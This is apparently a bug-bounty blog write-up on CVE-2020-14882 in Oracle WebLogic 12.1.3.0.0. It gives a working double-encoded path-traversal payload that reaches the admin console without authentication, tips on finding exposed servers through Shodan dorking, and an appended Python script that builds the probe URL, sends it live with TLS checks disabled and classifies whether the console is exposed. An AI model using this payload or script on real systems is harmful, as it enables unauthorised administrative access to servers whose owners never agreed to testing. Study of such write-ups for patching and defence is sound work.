Easy Vulnerability Leads to Admin Console (P1)
I started looking at one target (the program has not given me permission to disclose its name).
Let’s start
After checking a few low-hanging fruits and doing some recon, I looked at the technologies in use. One of them was Oracle WebLogic Server, and I found that CVE-2020-14882 affects the 12.1.3.0.0 version of WebLogic, which is exactly what the target was running.
Oracle WebLogic Server version 12.1.3.0.0
Let's start with the exploit.
For example, let's assume the site is hosted on 192.168.1.79 and WebLogic's administration port is 7001 (the default).
As many of us know, sometimes an extra "/" or an encoded path segment is all it takes to get past a WAF. In WebLogic's case there is more to it: the console's authentication filter lets requests under /console/images/ (static resources) through without a login, so a traversal that starts under /console/images/ and walks back up to console.portal reaches the admin console unauthenticated.
The key piece of the payload is %252e%252e%252f, which is "../" URL-encoded twice ("../" → "%2e%2e%2f" → "%252e%252e%252f"); you can encode it yourself and check. On its own this only bypassed the WAF, and I was not happy with just a WAF bypass. I was hunting for bigger impact, and found the full payload that gives direct admin console access.
Payload: https://192.168.1.79:7001/console/images/%252e%252e%252fconsole.portal
The IP is just an example; focus on the path, which is /console/images/%252e%252e%252fconsole.portal. On a vulnerable server the response is the WebLogic admin console home page instead of a redirect to the login form. Oracle fixed this in the October 2020 Critical Patch Update, so a patched 12.1.3.0.0 will not render the console from this path.
So here is the screenshot PoC:

Now, a tip for bug hunters:
How and where you can find this:
- Search on shodan.io with some dorking
- Look for websites that use Oracle WebLogic
- Tip for beginners
- What if we don't have an IP? What if port 7001 isn't open? How can we exploit it without those? Don't worry, you still can.
- Just change the URL to this: https://target.com//console/images/%252e%252e%252fconsole.portal
- But keep one thing in mind: first you need to find the console login page, because the console may be mounted under any path on the website.
- For reference, video PoC:
- https://youtu.be/O0ZnLXRY5Wo
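To tie the payload and the tips together, here is an added example (my own script, not code from the original post) that builds the CVE-2020-14882 probe URL for either a host:port or a plain domain, and triages the HTTP response the way you would when deciding whether you have console access. The host names, ports, console path and the HTML markers used for detection (the login redirect to LoginForm.jsp, the console.portal links and the "WebLogic Server Version:" footer) are assumptions for illustration, and the sample response body is constructed for this example.

```python
# Added example, not from the original post. Assumptions: hosts/ports, the
# /console mount path, and the response markers used for triage.
import re
import ssl
import urllib.error
import urllib.request
from typing import Optional, Tuple

# Versions listed by Oracle as affected by CVE-2020-14882.
AFFECTED_VERSIONS = {"10.3.6.0.0", "12.1.3.0.0", "12.2.1.3.0", "12.2.1.4.0", "14.1.1.0.0"}


def double_encode(segment: str) -> str:
    """Percent-encode every byte, then encode the '%' signs once more.
    '../' -> '%2e%2e%2f' -> '%252e%252e%252f'"""
    once = "".join(f"%{b:02x}" for b in segment.encode())
    return once.replace("%", "%25")


def probe_url(host: str, port: Optional[int] = 7001, scheme: str = "https",
              console_path: str = "/console") -> str:
    """Traversal from /console/images/ (served without a login) back up to console.portal.
    port=None covers the 'no 7001 open, console behind the normal web port' case."""
    authority = host if port is None else f"{host}:{port}"
    return f"{scheme}://{authority}{console_path}/images/{double_encode('../')}console.portal"


# Assumed footer text of the console home page; used to pick out the version.
VERSION_RE = re.compile(r"WebLogic Server Version:\s*([\d.]+)")


def classify(status: int, headers: dict, body: str) -> Tuple[str, Optional[str]]:
    """Turn a raw response into a verdict plus the version string if the page shows one."""
    location = headers.get("Location", "")
    if status in (301, 302, 303) and "LoginForm.jsp" in location:
        return "login-required", None          # auth filter still in the way
    if status == 200 and "console.portal" in body and "WebLogic" in body:
        m = VERSION_RE.search(body)
        return "console-exposed", (m.group(1) if m else None)
    if status == 404:
        return "console-not-here", None        # console mounted elsewhere, or absent
    return "unknown", None


def is_affected(version: Optional[str]) -> bool:
    return version in AFFECTED_VERSIONS


def send_probe(url: str, timeout: float = 10.0) -> Tuple[int, dict, str]:
    """Live request (only used when run as a script). Redirects are not followed so the
    login redirect stays visible; TLS verification is off for self-signed consoles."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None
    ctx = ssl._create_unverified_context()
    opener = urllib.request.build_opener(NoRedirect, urllib.request.HTTPSHandler(context=ctx))
    try:
        resp = opener.open(url, timeout=timeout)
        return resp.status, dict(resp.headers), resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, dict(e.headers), e.read().decode(errors="replace")


# Constructed sample of what a vulnerable console answers (not a real capture).
SAMPLE_CONSOLE_BODY = """<html><head><title>Home Page - base_domain - WLS Console</title></head>
<body><a href="/console/console.portal?_nfpb=true&_pageLabel=HomePage1">Home</a>
<div id="footer">WebLogic Server Version: 12.1.3.0.0</div></body></html>"""


if __name__ == "__main__":
    # Offline walk-through on the constructed sample.
    verdict, version = classify(200, {}, SAMPLE_CONSOLE_BODY)
    print(probe_url("192.168.1.79"), verdict, version, is_affected(version))
    # Live use: python probe.py would be extended with
    #   status, headers, body = send_probe(probe_url("target.com", port=None))
    #   print(classify(status, headers, body))
```

The important decision in the script is not following redirects: a patched or correctly configured console answers the traversal with a 302 to the login form, and if your HTTP client follows it you end up looking at a 200 login page and may misread it as success. Treat "console-exposed" as the moment to stop and write the report; the console itself is the P1 impact, and you do not need to go further on a program's production system.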
Thanks all, stay connected; I will post more new things.